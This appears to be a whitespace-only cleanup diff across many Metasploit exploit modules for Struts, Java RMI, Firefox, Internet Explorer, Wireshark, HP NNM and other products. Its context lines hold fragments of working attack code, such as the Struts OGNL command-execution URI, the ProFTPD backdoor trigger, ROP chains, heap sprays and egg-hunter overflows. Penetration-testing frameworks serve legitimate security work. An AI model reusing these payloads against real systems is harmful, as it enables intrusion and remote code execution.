+					success = true if(res.body.scan(/Welcome to Axis2 Web/i).size == 1)
+					if (res.headers['Set-Cookie'] =~ /JSESSIONID=(.*);/)
+						session = $1
+					end
+				end
 
-            rescue ::Rex::ConnectionError
-                print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin Unable to attempt authentication")
-            end
-        end
+			rescue ::Rex::ConnectionError
+				print_error("http://#{rhost}:#{rport}/#{rpath}/axis2-admin Unable to attempt authentication")
+			end
+		end
 
 		if success
 			print_good("http://#{rhost}:#{rport}/#{rpath}/axis2-admin [#{srvhdr}] [Axis2 Web Admin Module] successful login '#{user}' : '#{pass}'")

--- a/modules/exploits/multi/http/glassfish_deployer.rb
+++ b/modules/exploits/multi/http/glassfish_deployer.rb
@@ -119,7 +119,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		plat = detect_platform(res.body)
 		arch = detect_arch(res.body)
-		
+
 		# No arch or platform found?
 		return nil if (not arch or not plat)
 
@@ -779,7 +779,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'GET'  => (version == '3.0' or version == '2.x' or version == '9.x') ? "get" : 'GET',
 			'POST' => (version == '3.0' or version == '2.x' or version == '9.x') ? 'post' : 'POST',
 		}
-		
+
 		#auth bypass
 		if version == '3.0' or version == '2.x' or version == '9.x'
 			success = try_glassfish_auth_bypass(version)

--- a/modules/exploits/multi/http/phpldapadmin_query_engine.rb
+++ b/modules/exploits/multi/http/phpldapadmin_query_engine.rb
@@ -21,7 +21,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Name'           => 'phpLDAPadmin <= 1.2.1.1 (query_engine) Remote PHP Code Injection',
 			'Description'    => %q{
 					This module exploits a vulnerability in the lib/functions.php that allows
-				attackers input parsed directly to the create_function() php function. A patch was 
+				attackers input parsed directly to the create_function() php function. A patch was
 				issued that uses a whitelist regex expression to check the user supplied input
 				before being parsed to the create_function() call.
 			},

--- a/modules/exploits/multi/http/spree_search_exec.rb
+++ b/modules/exploits/multi/http/spree_search_exec.rb
@@ -68,11 +68,11 @@ class Metasploit3 < Msf::Exploit::Remote
 				'Connection' => 'Close',
 			}
 		}, 0.4 ) #short timeout, we don't care about the response
-			
+
 		if (res)
 			print_status("The server returned: #{res.code} #{res.message}")
 		end
-			
+
 		handler
 	end
 

--- a/modules/exploits/multi/http/struts_code_exec.rb
+++ b/modules/exploits/multi/http/struts_code_exec.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					This module exploits a remote command execution vulnerability in
 				Apache Struts versions < 2.2.0. This issue is caused by a failure to properly
 				handle unicode characters in OGNL extensive expressions passed to the web server.
-				
+
 					By sending a specially crafted request to the Struts application it is possible to
 				bypass the "#" restriction on ParameterInterceptors by using OGNL context variables.
 				Bypassing this restriction allows for the execution of arbitrary Java code.
@@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		var_c = rand_text_alpha_lower(4)
 		var_d = rand_text_alpha_lower(4)
 		var_e = rand_text_alpha_lower(4)
-		
+
 		uri << "?(%27\\u0023_memberAccess[\\%27allowStaticMethodAccess\\%27]%27)(#{var_a})=true&"
 		uri << "(aaaa)((%27\\u0023context[\\%27xwork.MethodAccessor.denyMethodExecution\\%27]\\u003d\\u0023#{var_c}%27)(\\u0023#{var_c}\\u003dnew%20java.lang.Boolean(\"false\")))&"
 		uri << "(#{var_b})((%27\\u0023#{var_d}.exec(\"CMD\")%27)(\\u0023#{var_d}\\u003d@java.lang.Runtime@getRuntime()))=1" if target['Platform'] == 'win'

--- a/modules/exploits/multi/misc/java_rmi_server.rb
+++ b/modules/exploits/multi/misc/java_rmi_server.rb
@@ -30,7 +30,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					Note that it does not work against Java Management Extension (JMX) ports since those do
 				not support remote class loading, unless another RMI endpoint is active in the same
 				Java process.
-				
+
 					RMI method calls do not support or require any sort of authentication.
 			},
 			'Author'         => [ 'mihi' ],
@@ -109,12 +109,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		while not session_created?
 			select(nil, nil, nil, 0.25)
 			handler()
-		end		
-		
+		end
+
 	end
 
 	def on_request_uri(cli, request)
-		if request.uri =~ /\.jar$/i		
+		if request.uri =~ /\.jar$/i
 			p = regenerate_payload(cli)
 			jar = p.encoded_jar
 			paths = [
@@ -134,7 +134,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 	end
 
-	
+
 	def gen_rmi_packet
 		"\x50\xac\xed\x00\x05\x77\x22\x00\x00\x00\x00\x00\x00\x00\x02\x00" +
 		"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00" +

--- a/modules/exploits/multi/misc/zend_java_bridge.rb
+++ b/modules/exploits/multi/misc/zend_java_bridge.rb
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					This module takes advantage of a trust relationship issue within the
 				Zend Server Java Bridge. The Java Bridge is responsible for handling interactions
 				between PHP and Java code within Zend Server.
-				
+
 					When Java code is encountered Zend Server communicates with the Java Bridge. The
 				Java Bridge then handles the java code and creates the objects within the Java Virtual
 				Machine. This interaction however, does not require any sort of authentication. This
@@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		start_service()
 		send_java_require
 	end
-	
+
 	def send_java_require()
 		connect
 
@@ -73,11 +73,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		print_status("Sending java_require() request... #{path}")
 		sock.put(java_require)
 		res = sock.get_once
-		
+
 		select(nil, nil, nil, 5) # wait for the request to be handled
 		create_and_exec
 	end
-	
+
 	def create_and_exec
 		print_status("Sending Final Java Bridge Requests")
 

--- a/modules/exploits/netware/sunrpc/pkernel_callit.rb
+++ b/modules/exploits/netware/sunrpc/pkernel_callit.rb
@@ -14,7 +14,7 @@ require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = GoodRanking
-	
+
 	include Msf::Exploit::Remote::Udp
 
 	def initialize(info = {})

--- a/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
+++ b/modules/exploits/unix/ftp/proftpd_133c_backdoor.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		sock.put("HELP ACIDBITCHEZ\r\n")
 
 		res = sock.get_once(-1,10)
-	
+
 		if ( res and res =~ /502/ )
 			print_error("Not backdoored")
 		else

--- a/modules/exploits/unix/http/contentkeeperweb_mimencode.rb
+++ b/modules/exploits/unix/http/contentkeeperweb_mimencode.rb
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		req << "Host: #{datastore['RHOST']}\r\n"
 		sock.put(req + "\r\n\r\n")
 
-		handler	
+		handler
 		disconnect
 		select(nil,nil,nil,3) # Wait for session creation.
 		if not datastore['SkipEscalation'] and session_created? and datastore['PAYLOAD'] =~ /perl/

--- a/modules/exploits/unix/http/lifesize_room.rb
+++ b/modules/exploits/unix/http/lifesize_room.rb
@@ -25,7 +25,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				Room is an appliance and thus the environment is limited
 				resulting in a small set of payload options.
 			},
-			'Author'	=> 
+			'Author'	=>
 				[
 					# SecureState R&D Team - Special Thanks To Chris Murrey
 					'Spencer McIntyre',

--- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb
+++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb
@@ -112,10 +112,10 @@ EOS
 
 		if not res
 			if not session_created?
-				print_error('Unable to complete XML-RPC request')	
+				print_error('Unable to complete XML-RPC request')
 				return nil
 			end
-			
+
 			# no response, but session created!!!
 			return true
 		end

--- a/modules/exploits/unix/webapp/php_include.rb
+++ b/modules/exploits/unix/webapp/php_include.rb
@@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 			# print_status("Sending #{tpath+uri}")
 			begin
-				if http_method == "GET"	
+				if http_method == "GET"
 					response = send_request_raw( {
 						'global' => true,
 						'uri'    => tpath+uri,

--- a/modules/exploits/windows/antivirus/ams_xfr.rb
+++ b/modules/exploits/windows/antivirus/ams_xfr.rb
@@ -93,7 +93,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				end
 
 		disconnect
-		
+
 	end
 
 	def exploit

--- a/modules/exploits/windows/brightstor/tape_engine_8A.rb
+++ b/modules/exploits/windows/brightstor/tape_engine_8A.rb
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform' => 'win',
 			'Targets'  =>
 				[
-					[ 'BrightStor ARCserve r11.5/Windows 2003',     { 'Ret' => 0x28eb6493 } ],	
+					[ 'BrightStor ARCserve r11.5/Windows 2003',     { 'Ret' => 0x28eb6493 } ],
 				],
 			'DisclosureDate' => 'Oct 4 2010',
 			'DefaultTarget'  => 0))

--- a/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
+++ b/modules/exploits/windows/browser/adobe_flashplayer_avm.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		fd = File.open( path, "rb" )
 		@swf = fd.read(fd.stat.size)
 		fd.close
-		
+
 		super
 	end
 

--- a/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
+++ b/modules/exploits/windows/browser/cisco_anyconnect_exec.rb
@@ -69,7 +69,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			handler(cli)
 			return
 		end
-		
+
 		if request.uri.match(/updates\.txt/)
 			print_status("Client requested: #{request.uri}. Sending updates.txt")
 			updates = rand_text_alpha((rand(500) + 1)) + "\n" + rand_text_alpha((rand(500) + 1))

--- a/modules/exploits/windows/browser/java_codebase_trust.rb
+++ b/modules/exploits/windows/browser/java_codebase_trust.rb
@@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Platform' => 'java',
 						}
 					],
-					
+
 					# Native payloads aren't currently supported (only work with jar/war)
 =begin
 					[ 'Windows x86',
@@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'DefaultTarget'  => 0,
 			'DisclosureDate' => 'Feb 15 2011'
 			))
-	
+
 		register_options(
 			[
 				# This is the default for a 32-bit Windows install

--- a/modules/exploits/windows/browser/java_docbase_bof.rb
+++ b/modules/exploits/windows/browser/java_docbase_bof.rb
@@ -179,7 +179,7 @@ EOS
 			0x41414141,
 			0x41414141,
 			'st_eax_ecx',
-			
+
 			# Call our dword-stub
 			'jmp_ecx',
 
@@ -205,7 +205,7 @@ EOS
 
 			# Adjust it to skip the non-payload parts
 			'add_58_eax',
-			
+
 			# Execute it !
 			'jmp_eax',
 

--- a/modules/exploits/windows/browser/mozilla_mchannel.rb
+++ b/modules/exploits/windows/browser/mozilla_mchannel.rb
@@ -208,7 +208,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 				# POP r32 / RETN
 				rop_pivot << [0x7c3410c3].pack("V*")
-			
+
 				# 2. PUSH EAX / PUSH EBX / PUSH ESI / CALL [ECX+1C0]
 				rop_pivot << [0x6D325BFC].pack("V*")
 
@@ -312,7 +312,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 				var #{js_filler} = unescape("%u4344%u4142");
 				while(#{js_filler}.length < 0x201) {#{js_filler} += #{js_filler};}
-				
+
 				while(#{js_ret_addr_name}.length < 0x80) {#{js_ret_addr_name} += #{js_ret_addr_name};}
 
 				var #{js_chunk_name} = #{js_ret_addr_name}.substring(0,0x18/2);

--- a/modules/exploits/windows/browser/mozilla_nstreerange.rb
+++ b/modules/exploits/windows/browser/mozilla_nstreerange.rb
@@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
 
 	include Msf::Exploit::Remote::HttpServer::HTML
-	
+
 	include Msf::Exploit::Remote::BrowserAutopwn
 	autopwn_info({
 		:ua_name => HttpClients::FF,
@@ -141,7 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			], self.class
 		)
 	end
-	
+
 	def prepare_payload(target, p)
 		base_offset = (datastore['Crash'] != true) ? datastore['BaseOffset'] : 1
 		spray_size = datastore['SpraySize']
@@ -177,11 +177,11 @@ class Metasploit3 < Msf::Exploit::Remote
 				]
 			end
 		}
-		
+
 		add_call.call(target['LLOffset'], base_offset, 0) # use dummy LoadLibrary call to push valid fourth VirtualProtect argument on stack
 		add_call.call(target['VPOffset'], 0x10000, 0x40) # call VirtualProtect to make heap executable
 		add_call.call(0xDEADBEEF, 0, 0, true) # call our shellcode
-	
+
 		callchain.flatten!
 		callchain[-1] = base_offset + (callchain.length*4) # patch last offset to point to shellcode located after callchain
 

--- a/modules/exploits/windows/browser/mozilla_reduceright.rb
+++ b/modules/exploits/windows/browser/mozilla_reduceright.rb
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				my_target = targets[2]
 			end
 		end
-		
+
 		table = [junk(2)].pack('v*')
 		table << [
 			0x0c000048,
@@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			my_target['pivot2'],
 			junk,
 			junk,
-			junk,	
+			junk,
 			junk,
 			junk,
 			junk,
@@ -333,7 +333,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			</body>
 			<html>
 			HTML
-			
+
 		end
 
 		html = html.gsub(/^\t\t/, '')

--- a/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
+++ b/modules/exploits/windows/browser/ms11_003_ie_css_import.rb
@@ -399,7 +399,7 @@ EOS
 
 			'mov [ecx], eax / mov al, 1 / pop ebp / ret 0xc',
 			:unused,
-			
+
 			'pop esi / ret',
 			:unused,
 			:unused,

--- a/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
+++ b/modules/exploits/windows/browser/viscom_movieplayer_drawtext.rb
@@ -104,7 +104,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		if my_target.name =~ /IE8/
 
-			pivot_rop = 
+			pivot_rop =
 			[ # Pivot to get to ROP Chain
 				0x10015201, # POP EBP # RETN 08 [MOVIEP~1.OCX]
 				pivot_addr,

--- a/modules/exploits/windows/fileformat/aol_desktop_linktag.rb
+++ b/modules/exploits/windows/fileformat/aol_desktop_linktag.rb
@@ -50,7 +50,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				{
 					'ExitFunction' => "process",
 				},
-			'Platform'       => 'win',	
+			'Platform'       => 'win',
 			'Targets'	     =>
 				[
 					[

--- a/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
+++ b/modules/exploits/windows/fileformat/aviosoft_plf_buf.rb
@@ -68,7 +68,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	end
 
 	def nops(rop=false, n=1)
-	 	return rop ? [0x61326003] * n : [0x90909090] * n
+		return rop ? [0x61326003] * n : [0x90909090] * n
 	end
 
 	def exploit

--- a/modules/exploits/windows/fileformat/cytel_studio_cy3.rb
+++ b/modules/exploits/windows/fileformat/cytel_studio_cy3.rb
@@ -20,14 +20,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'Cytel Studio 9.0 (CY3 File) Stack Buffer Overflow',
-			'Description'    => %q{ 
+			'Description'    => %q{
 					This module exploits a stack based buffer overflow found
 				in Cytel Studio <= 9.0. The overflow is triggered during the
 				copying of strings to a stack buffer of 256 bytes.
 			},
 			'License'        => MSF_LICENSE,
 			'Author'         =>
-				[ 
+				[
 					'Luigi Auriemma',  # Initial Discovery/PoC
 					'James Fitts'      # Metasploit Module (Thx Juan & Jeff)
 				],
@@ -53,9 +53,9 @@ class Metasploit3 < Msf::Exploit::Remote
 				[
 					[
 						# File version 8.0.0.1
-						'Cytel Studio 9.0', 
-						{ 
-							'Ret' => 0x73e58e01, # p/p/r mfc42.dll 
+						'Cytel Studio 9.0',
+						{
+							'Ret' => 0x73e58e01, # p/p/r mfc42.dll
 							'Offset' => 500
 						}
 					],

--- a/modules/exploits/windows/fileformat/fatplayer_wav.rb
+++ b/modules/exploits/windows/fileformat/fatplayer_wav.rb
@@ -73,11 +73,11 @@ class Metasploit3 < Msf::Exploit::Remote
 		sploit << rand_text_alpha_upper(3932 - (payload.encoded.length))
 		sploit << generate_seh_record(target.ret)
 		sploit << "\xe9\x60\xf0\xff\xff"	# Jump back 4000 bytes
-			
+
 		print_status("Creating '#{datastore['FILENAME']}' file ...")
 
 		file_create(sploit)
-		
+
 	end
 
 end

--- a/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
+++ b/modules/exploits/windows/fileformat/foxit_reader_filewrite.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	include Msf::Exploit::FILEFORMAT
 	include Msf::Exploit::EXE
-	
+
 	def initialize(info={})
 		super(update_info(info,
 			'Name'           => 'Foxit PDF Reader 4.2 Javascript File Write',
@@ -24,7 +24,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					This module exploits an unsafe Javascript API implemented in Foxit PDF Reader
 					version 4.2. The createDataObject() Javascript API function allows for writing
 					arbitrary files to the file system. This issue was fixed in version 4.3.1.0218.
-					
+
 					Note: This exploit uses the All Users directory currently, which required
 					administrator privileges to write to. This means an administrative user has to
 					open the file to be successful. Kind of lame but thats how it goes sometimes in

--- a/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
+++ b/modules/exploits/windows/fileformat/free_mp3_ripper_wav.rb
@@ -16,7 +16,7 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'Free MP3 CD Ripper 1.1 (WAV File) Stack Buffer Overflow',
-			'Description'    => %q{ 
+			'Description'    => %q{
 					This module exploits a stack based buffer overflow found in Free MP3 CD
 				Ripper 1.1.  The overflow is triggered when an unsuspecting user opens a malicious
 				WAV file.
@@ -49,12 +49,12 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Platform' => 'win',
 			'Targets'        =>
 				[
-					[ 
+					[
 						'Windows XP SP3 EN',
-						{ 
+						{
 							'Ret' => 0x1001860b, # p/p/r in libFLAC.dll
 							'Offset' => 4116
-						} 
+						}
 					],
 				],
 			'Privileged'     => false,

--- a/modules/exploits/windows/fileformat/lotusnotes_lzh.rb
+++ b/modules/exploits/windows/fileformat/lotusnotes_lzh.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Ret'    => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll
 						}
 					],
-					
+
 					[ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP',
 						{
 							'Offset' => 6745,

--- a/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb
+++ b/modules/exploits/windows/fileformat/mini_stream_pls_bof.rb
@@ -15,9 +15,9 @@ class Metasploit3 < Msf::Exploit::Remote
 	def initialize(info = {})
 		super(update_info(info,
 			'Name'           => 'Mini-Stream RM-MP3 Converter v3.1.2.1 (PLS File) Stack Buffer Overflow',
-			'Description'    => %q{ 
+			'Description'    => %q{
 				This module exploits a stack based buffer overflow found in Mini-Stream RM-MP3
-				Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim 
+				Converter v3.1.2.1. The overflow is triggered when an unsuspecting victim
 				opens the malicious PLS file.
 			},
 			'License'        => MSF_LICENSE,
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Exploit::Remote
 						{
 							'Ret' => 0x100371f5, # call esp in MSRMfilter03.dll
 							'Offset' => 17417
-						} 
+						}
 					]
 				],
 			'Privileged'     => false,

--- a/modules/exploits/windows/fileformat/visiwave_vwr_type.rb
+++ b/modules/exploits/windows/fileformat/visiwave_vwr_type.rb
@@ -42,7 +42,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'Version'        => '$Revision$',
 			'References'     =>
 				[
-					[ 'CVE', '2011-2386' ],	
+					[ 'CVE', '2011-2386' ],
 					[ 'OSVDB', '72464'],
 					[ 'URL', 'http://www.visiwave.com/blog/index.php?/archives/4-Version-2.1.9-Released.html' ],
 					[ 'URL', 'http://www.stratsec.net/Research/Advisories/VisiWave-Site-Survey-Report-Trusted-Pointer-%28SS-20'],

--- a/modules/exploits/windows/fileformat/vlc_webm.rb
+++ b/modules/exploits/windows/fileformat/vlc_webm.rb
@@ -109,7 +109,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		file << "\x01\x00\x00\x00"	#
 		file << "\x01\xff\xff\xff"	# This triggers our heap spray...
 		file << [target.ret].pack('V')	# Pointer to our heap spray
-	
+
 		# The alignment plays nice, so EIP will always
 		# hit our pivot when our heapspray works.  ESI contains
 		# 0x030b030a, which will point to one of our "pop; retn"
@@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		rop = rop.pack('V*')
 
 		# Overwrite the bad pointer with the address of an infinite
-		# loop so the other threads spin instead of crashing	
+		# loop so the other threads spin instead of crashing
 		rop << "\xc7\x05"
 		rop << [spray + 0xc].pack('V')
 		rop << [rop_base + 0x1c070].pack('V')	# mov DWORD PTR ds:[ptr],&loop

--- a/modules/exploits/windows/fileformat/wireshark_packet_dect.rb
+++ b/modules/exploits/windows/fileformat/wireshark_packet_dect.rb
@@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				OptString.new('FILENAME', [ true, 'pcap file',  'passwords.pcap']),
 			], self.class)
 	end
-	
+
 	def junk
 		return rand_text(4).unpack("L")[0].to_i
 	end
@@ -102,9 +102,9 @@ class Metasploit3 < Msf::Exploit::Remote
 		# tx dadr00p (https://twitter.com/dietersar) for testing the offsets below
 		rop_pivot =
 		[
-			0x618d7d0e,     # RET		
-			0x618d7d0e,     # RET		
-			0x618d7d0e,     # RET		
+			0x618d7d0e,     # RET
+			0x618d7d0e,     # RET
+			0x618d7d0e,     # RET
 			0x64f9d5ec,     # ADD ESP,0C # RET - libfontconfig-1.dll
 			0x618d7d0e,     # RET <- don't count on this one !
 			0x618d7d0e,     # RET
@@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		rop_gadgets =
 		[
-	
+
 			0x6d7155cb,     # PUSH ESP # POP EBX # POP EBP # RETN  **[libpangoft2-1.0-0.dll]
 			junk,
 			0x6d596e31,     # MOV EAX,EBX # POP EBX # POP EBP # RETN  **[libgio-2.0-0.dll]
@@ -132,7 +132,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			junk,
 			0x61c14552,     # POP EBX # RETN    ** [freetype6.dll]
 			0x00000800,     # size - 0x800 should be more than enough
-			0x61c14043,     # POP ESI # RETN    ** [freetype6.dll]	
+			0x61c14043,     # POP ESI # RETN    ** [freetype6.dll]
 			0x0000009C,
 			0x6d58321a,     # ADD EAX,ESI # POP ESI # POP EBP # RETN    **[libgio-2.0-0.dll]
 			junk,

--- a/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
+++ b/modules/exploits/windows/http/ca_arcserve_rpc_authbypass.rb
@@ -55,7 +55,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DisclosureDate' => 'July 25 2011',
 			'DefaultTarget' => 0))
-			
+
 
 		register_options(
 			[

--- a/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
+++ b/modules/exploits/windows/http/ca_totaldefense_regeneratereports.rb
@@ -106,7 +106,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				'ctype' => 'application/soap+xml; charset=utf-8',
 				'data' => soap,
 			}, 5)
-		
+
 		if ( res and res.body =~ /SUCCESS/ )
 				#print_good("Executing command...")
 			else

--- a/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb
+++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_hostname.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		boom << hunter + egg + egg
 		boom << payload.encoded
 		boom << rand_text_alpha_upper(90024 - payload.encoded.length)
-		
+
 		sploit = "SnmpVals=&Hostname=#{boom}"
 
 		print_status("Trying target #{target.name}...")
@@ -86,7 +86,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			'method'	=> 'POST',
 			'data'		=> sploit
 			}, 8)
-		
+
 		handler
 
 	end

--- a/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb
+++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_icount.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		boom << hunter + egg + egg
 		boom << payload.encoded
 		boom << rand_text_alpha_upper(9024 - payload.encoded.length)
-		
+
 		sploit =  "SnmpVals=&ICount=-9#{boom}"
 
 		print_status("Trying target #{target.name}...")

--- a/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb
+++ b/modules/exploits/windows/http/hp_nnm_getnnmdata_maxage.rb
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		boom << hunter + egg + egg
 		boom << payload.encoded
 		boom << rand_text_alpha_upper(9024 - payload.encoded.length)
-	
+
 		sploit =  "SnmpVals=&MaxAge=#{boom}"
 
 		print_status("Trying target #{target.name}...")

--- a/modules/exploits/windows/http/hp_openview_insight_backdoor.rb
+++ b/modules/exploits/windows/http/hp_openview_insight_backdoor.rb
@@ -104,7 +104,7 @@ this.internal.addRole("admin");
 
 					}
 			}, 5)
-		
+
 		if ( res and res.code == 200 )
 			print_status("Login/Upload successful. Triggering payload at '/help/#{dir}/#{page}'...")
 			send_request_raw({

--- a/modules/exploits/windows/http/manageengine_apps_mngr.rb
+++ b/modules/exploits/windows/http/manageengine_apps_mngr.rb
@@ -33,7 +33,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				],
 			'DefaultTarget'	 => 0
 			)
-			
+
 		register_options(
 			[ Opt::RPORT(9090),
 				OptString.new('URI', [false, "URI for Applications Manager", '/']),

--- a/modules/exploits/windows/http/osb_uname_jlist.rb
+++ b/modules/exploits/windows/http/osb_uname_jlist.rb
@@ -61,14 +61,14 @@ class Metasploit3 < Msf::Exploit::Remote
 	def windows_stager
 
 		exe_fname = rand_text_alphanumeric(4+rand(4)) + ".exe"
-		
+
 		print_status("Sending request to #{datastore['RHOST']}:#{datastore['RPORT']}")
 		execute_cmdstager({ :temp => '.'})
 		@payload_exe = payload_exe
-		
+
 		print_status("Attempting to execute the payload...")
 		execute_command(@payload_exe)
-	
+
 	end
 
 	def execute_command(cmd, opts = {})
@@ -84,7 +84,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			sessionid = res.headers['Set-Cookie'].split(';')[0]
 
 			data = '?type=Job&jlist=0%26' + Rex::Text::uri_encode(cmd)
-		
+
 			send_request_raw(
 				{
 					'uri'   => '/property_box.php' + data,
@@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		handler
-	
+
 	end
 end
 

--- a/modules/exploits/windows/lotus/domino_icalendar_organizer.rb
+++ b/modules/exploits/windows/lotus/domino_icalendar_organizer.rb
@@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			return Exploit::CheckCode::Safe
 		end
 	end
-	
+
 	def exploit
 		sploit = ''
 		if target.name =~ /Windows 2000 SP4/

--- a/modules/exploits/windows/lotus/lotusnotes_lzh.rb
+++ b/modules/exploits/windows/lotus/lotusnotes_lzh.rb
@@ -58,7 +58,7 @@ class Metasploit3 < Msf::Exploit::Remote
 							'Ret'    => 0x780c26b2 # POP ECX; POP ECX; RETN MSVCP60.dll
 						}
 					],
-					
+
 					[ 'Lotus Notes 8.5.2 FP2 / Windows Universal / DEP',
 						{
 							'Offset' => 6745,

--- a/modules/exploits/windows/misc/bcaaa_bof.rb
+++ b/modules/exploits/windows/misc/bcaaa_bof.rb
@@ -62,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Remote
 					OptInt.new("ATTEMPTS", [true, "Number of attempts to try to exploit", 3]),
 				], self.class)
 	end
-	
+
 	def junk
 		return rand_text(4).unpack("L")[0].to_i
 	end

--- a/modules/exploits/windows/misc/hp_omniinet_3.rb
+++ b/modules/exploits/windows/misc/hp_omniinet_3.rb
@@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		print_status("Trying #{target.name}...")
 		sock.put(packet)
-		
+
 		select(nil,nil,nil,10)
 		handler
 		disconnect

--- a/modules/exploits/windows/misc/pxexploit.rb
+++ b/modules/exploits/windows/misc/pxexploit.rb
@@ -28,7 +28,7 @@ class Metasploit3 < Msf::Exploit::Remote
 				The default configuration loads a linux kernel and initrd into memory that
 				reads the hard drive; placing the payload on the hard drive of any Windows
 				partition seen.
-				
+
 				Note: the displayed IP address of a target is the address this DHCP server
 				handed out, not the "normal" IP address the host uses.
 			},

--- a/modules/exploits/windows/misc/wireshark_packet_dect.rb
+++ b/modules/exploits/windows/misc/wireshark_packet_dect.rb
@@ -121,7 +121,7 @@ class Metasploit3 < Msf::Exploit::Remote
 			junk,
 			0x61c14552,     # POP EBX # RETN    ** [freetype6.dll]
 			0x00000800,     # size - 0x800 should be more than enough
-			0x61c14043,     # POP ESI # RETN    ** [freetype6.dll]	
+			0x61c14043,     # POP ESI # RETN    ** [freetype6.dll]
 			0x0000009C,
 			0x6d58321a,     # ADD EAX,ESI # POP ESI # POP EBP # RETN    **[libgio-2.0-0.dll]
 			junk,

--- a/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
+++ b/modules/exploits/windows/mssql/ms09_004_sp_replwritetovarbin_sqli.rb
@@ -453,7 +453,7 @@ exec sp_executesql @z|
 
 
 	def mssql_query_version
-		
+
 		delay = 5
 
 		# Let's first check that we can reach the host with no problems

--- a/modules/exploits/windows/mssql/mssql_payload.rb
+++ b/modules/exploits/windows/mssql/mssql_payload.rb
@@ -87,7 +87,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 
 		method = datastore['METHOD'].downcase
-		
+
 		if (method =~ /^cmd/)
 			execute_cmdstager({ :linemax => 1500, :nodelete => true })
 			#execute_cmdstager({ :linemax => 1500 })

